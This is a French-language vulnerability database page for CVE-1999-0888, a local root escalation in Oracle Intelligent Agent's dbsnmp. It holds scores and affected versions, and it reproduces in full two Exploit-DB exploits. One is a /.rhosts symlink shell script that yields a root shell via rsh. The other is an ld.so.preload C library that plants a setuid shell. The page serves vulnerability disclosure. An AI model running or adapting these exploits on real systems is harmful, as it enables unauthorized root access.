CVE-1999-0888 : Détail

CVE-1999-0888

0.21%V4
Local
2000-04-18
02h00 +00:00
2024-08-01
16h55 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

dbsnmp in Oracle Intelligent Agent allows local users to gain privileges by setting the ORACLE_HOME environmental variable, which dbsnmp uses to find the nmiconf.tcl script.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 19460

Date de publication : 1999-08-15 22h00 +00:00
Auteur : Brock Tellier
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/585/info A vulnerability in the Oracle Intelligent Agent allows local malicious users to execute arbitrary commands and to create world writable files as the root user. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin . This setuid root and setgid dba program trusts the environment variable ORACLE_HOME without verifying its contents. This vulnerability can be exploited in a number of ways. The dbsnmp program calls a tcl script ( nmiconf.tcl ) located by default in $ORACLE_HOME/network/agent/config. A malicious user can craft his own nmiconf.tcl script and fool the dbsnmp program to execute as root. When run without ORACLE_HOME being set, dbsnmp will dump two log files out into the current working directory: dbsnmpc and dbsnmpt . If these files do not exist, dbsnmp will attempt to create them mode 666 and dump around 400 bytes of uncontrollable output into them. If the files do exist, dbsnmp will append these 400 bytes but not change the permissions. Thus a malicious user can create world writable files in the system that do not exist (e.g. /.rhosts). #!/bin/sh # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others # You'll probably have to change your path to dbsnmp # Exploit will only work if /.rhosts does NOT exist # # Brock Tellier btellier@usa.net cd /tmp unset ORACLE_HOME umask 0000 ln -s /.rhosts /tmp/dbsnmpc.log /u01/app/oracle/product/8.1.5/bin/dbsnmp echo "+ +" > /.rhosts rsh -l root localhost 'sh -i' rsh -l root localhost rm /tmp/*log* rsh -l root localhost rm /.rhosts
Exploit Database EDB-ID : 19461

Date de publication : 1999-08-15 22h00 +00:00
Auteur : Gilles PARC
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/585/info A vulnerability in the Oracle Intelligent Agent allows local malicious users to execute arbitrary commands and to create world writable files as the root user. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin . This setuid root and setgid dba program trusts the environment variable ORACLE_HOME without verifying its contents. This vulnerability can be exploited in a number of ways. The dbsnmp program calls a tcl script ( nmiconf.tcl ) located by default in $ORACLE_HOME/network/agent/config. A malicious user can craft his own nmiconf.tcl script and fool the dbsnmp program to execute as root. When run without ORACLE_HOME being set, dbsnmp will dump two log files out into the current working directory: dbsnmpc and dbsnmpt . If these files do not exist, dbsnmp will attempt to create them mode 666 and dump around 400 bytes of uncontrollable output into them. If the files do exist, dbsnmp will append these 400 bytes but not change the permissions. Thus a malicious user can create world writable files in the system that do not exist (e.g. /.rhosts). #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { remove("/etc/ld.so.preload"); execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); } } */ $ gcc -o oracle-ex.o -c oracle-ex.c -fPIC $ gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles $ unset ORACLE_HOME $ umask 0000 $ ln -s /etc/ld.so.preload /tmp/listener.log $ /u01/app/oracle/product/8.0.5/bin/tnslsnr $ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload $ telnet localhost Trying ... Connected to localhost.localdomain. Escape character is '^]'. Connection closed by foreign host. $ ./xxxx # /*

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version 7.3.3

Oracle>>Database_server >> Version 7.3.4

Oracle>>Oracle8i >> Version 8.0.3

    Oracle>>Oracle8i >> Version 8.0.4

      Oracle>>Oracle8i >> Version 8.0.5

        Oracle>>Oracle8i >> Version 8.0.5.1

          Oracle>>Oracle8i >> Version 8.1.5

            Références

            http://www.securityfocus.com/bid/585
            Tags : vdb-entry, x_refsource_BID
            Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.